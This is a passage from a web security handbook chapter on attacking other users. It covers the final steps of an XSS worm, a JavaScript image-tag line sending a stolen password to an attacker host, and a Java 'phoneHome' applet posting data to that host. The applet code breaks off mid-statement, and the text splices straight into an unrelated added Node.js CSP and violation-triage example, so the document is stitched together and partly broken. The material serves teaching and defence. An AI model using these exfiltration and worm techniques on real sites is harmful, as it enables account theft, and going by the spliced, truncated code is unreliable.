The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws
Chapter 12: Attacking Other Users



5. Make a POST request (including the per-page token) to the user's Add Friend page to add the worm's author as a friend.

6. Make a GET request to the user's Add Hero page to extract the per-page token that it contains.

7. Make a POST request (including the per-page token) to the user's Add Hero page to add the worm's author as a hero and also embed the source code for the worm itself, so that it will propagate when other people view the user's profile.



Making Asynchronous Off-Site Requests

The browser's same origin policy prevents XMLHttpRequest from being used to make off-site requests, because this would enable a malicious web site to retrieve and process data from other domains. Hence, in the earlier example, the attacker could not use XMLHttpRequest to submit the user's existing password out to an external server which he controls. However, this restriction can be circumvented by supplementing Ajax with other techniques.

There are numerous ways in which an injected script may cause arbitrary captured data to be submitted to an external server. To generate a single request, an image tag can be created with an arbitrary source URL. For example, having parsed out the victim's password from the account details page, the attacker can transmit this to his server using the following JavaScript:

document.write('<img src="http://wahh-attacker.com/' + password + '">');

By creating numerous such tags programmatically, it is possible to generate asynchronous requests to an external server. Another way for an attacker to do this is to call out to a Java applet from his injected code. For example, the attacker can create an applet that implements the following method:

import java.io.*;
import java.net.*;

// Applet method invoked from the injected script: opens a connection to the
// attacker's server and prepares a form-encoded POST body carrying the data.
public String phoneHome(String data)
{
    try
    {
        URLConnection urlConn = new URL(
            "http://wahh-attacker.com/phonehome").openConnection();
        urlConn.setDoOutput(true);
        urlConn.setRequestProperty("Content-Type",
            "application/x-www-form-urlencoded");
        DataOutputStream dos = new DataOutputStream(
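Both off-site channels described in this section, the programmatically created image tag and the applet call-out, are exactly what a Content Security Policy lets an application shut off, and the violation reports a browser sends when it blocks such a load are a useful detection signal. The following is an added example for Node.js, not code from the book: it builds a first-party-only policy (`img-src 'self'`, `object-src 'none'`, `connect-src 'self'`) and triages constructed CSP violation reports, flagging blocked loads to an external host and, where the blocked URL still carries a query or path, parameters or segments that look like captured values. The first-party host `wahh-app.example`, the report bodies and the severity scheme are assumptions; `wahh-attacker.com` is reused from the text. Note that, depending on the CSP level the browser implements, a cross-origin `blocked-uri` may be reduced to its origin, so the external-host check is the reliable signal and the data heuristics are a bonus.

```javascript
// Added example (not from the book): a CSP that blocks the image-beacon and
// applet channels, plus triage of the violation reports it produces.
// Host names, paths and report bodies are constructed for illustration.

// Policy for an application that serves its own assets and uses no plugins.
// report-uri is the legacy reporting directive; report-to is its successor.
function buildCsp(reportPath = '/csp-report') {
  return [
    "default-src 'self'",
    "script-src 'self'",   // no inline script: an injected <script> body does not run
    "img-src 'self'",      // blocks <img src="http://attacker/..."> beacons
    "connect-src 'self'",  // XMLHttpRequest/fetch stay first-party, as SOP already requires
    "object-src 'none'",   // no Java applets or other plugin content
    `report-uri ${reportPath}`,
  ].join('; ');
}

// Parameter names suggesting the blocked URL was carrying captured values.
const SENSITIVE_PARAM = /^(pass(word|wd)?|pwd|secret|token|session(id)?|sid|cookie|auth)$/i;

// Shannon entropy in bits per character; encoded or encrypted blobs score high.
function entropyBitsPerChar(s) {
  if (!s.length) return 0;
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Triage one report as posted by the browser ({"csp-report": {...}}).
// A cross-origin blocked-uri may be reduced to its origin by the browser, so
// `external` is the dependable signal; `carriesData` applies only when a path
// or query survives in the report.
function triageCspReport(body, firstPartyHost) {
  const r = body['csp-report'] || body;
  const directive = String(r['effective-directive'] || r['violated-directive'] || '');
  const blocked = String(r['blocked-uri'] || '');
  let u = null;
  try { u = new URL(blocked); } catch (e) { /* 'inline', 'eval' or a bare scheme */ }

  const external = u !== null && u.hostname !== firstPartyHost;
  const sensitiveParams = u
    ? [...u.searchParams.keys()].filter((k) => SENSITIVE_PARAM.test(k))
    : [];
  const highEntropySegment = u
    ? u.pathname.split('/').concat([...u.searchParams.values()])
        .some((seg) => seg.length >= 16 && entropyBitsPerChar(seg) > 3.5)
    : false;
  const carriesData = sensitiveParams.length > 0 || highEntropySegment;

  let severity = 'info';
  if (external && /^(img-src|object-src|connect-src)/.test(directive)) severity = 'medium';
  if (external && carriesData) severity = 'high';

  return {
    directive,
    blockedHost: u ? u.hostname : blocked,
    external,
    sensitiveParams,
    carriesData,
    severity,
    documentUri: String(r['document-uri'] || ''),
  };
}

// Constructed sample reports: an image beacon carrying a password, a blocked
// applet class load, and a benign inline-style violation on the app's own page.
const SAMPLE_REPORTS = [
  { 'csp-report': { 'document-uri': 'https://wahh-app.example/account',
      'effective-directive': 'img-src',
      'blocked-uri': 'http://wahh-attacker.com/?password=letmein123' } },
  { 'csp-report': { 'document-uri': 'https://wahh-app.example/profile',
      'effective-directive': 'object-src',
      'blocked-uri': 'http://wahh-attacker.com/PhoneHome.class' } },
  { 'csp-report': { 'document-uri': 'https://wahh-app.example/',
      'effective-directive': 'style-src-elem',
      'blocked-uri': 'inline' } },
];

function triageAll(reports = SAMPLE_REPORTS, firstPartyHost = 'wahh-app.example') {
  return reports.map((r) => triageCspReport(r, firstPartyHost));
}

// Usage: print the header value, then one triage line per sample report.
console.log('Content-Security-Policy: ' + buildCsp());
for (const t of triageAll()) {
  console.log(t.severity, t.directive, t.blockedHost, t.sensitiveParams.join(','));
}
```

The policy is defence in depth rather than a fix: CSP postdates the edition this chapter comes from, and a script that is already executing in the page has ways to cause a navigation that these directives do not cover, so the injection flaw itself still has to be removed. The triage output is meant to be fed to whatever alerting the application already has; a `high` result on an external host is worth treating as an active exploitation attempt rather than a misconfigured asset.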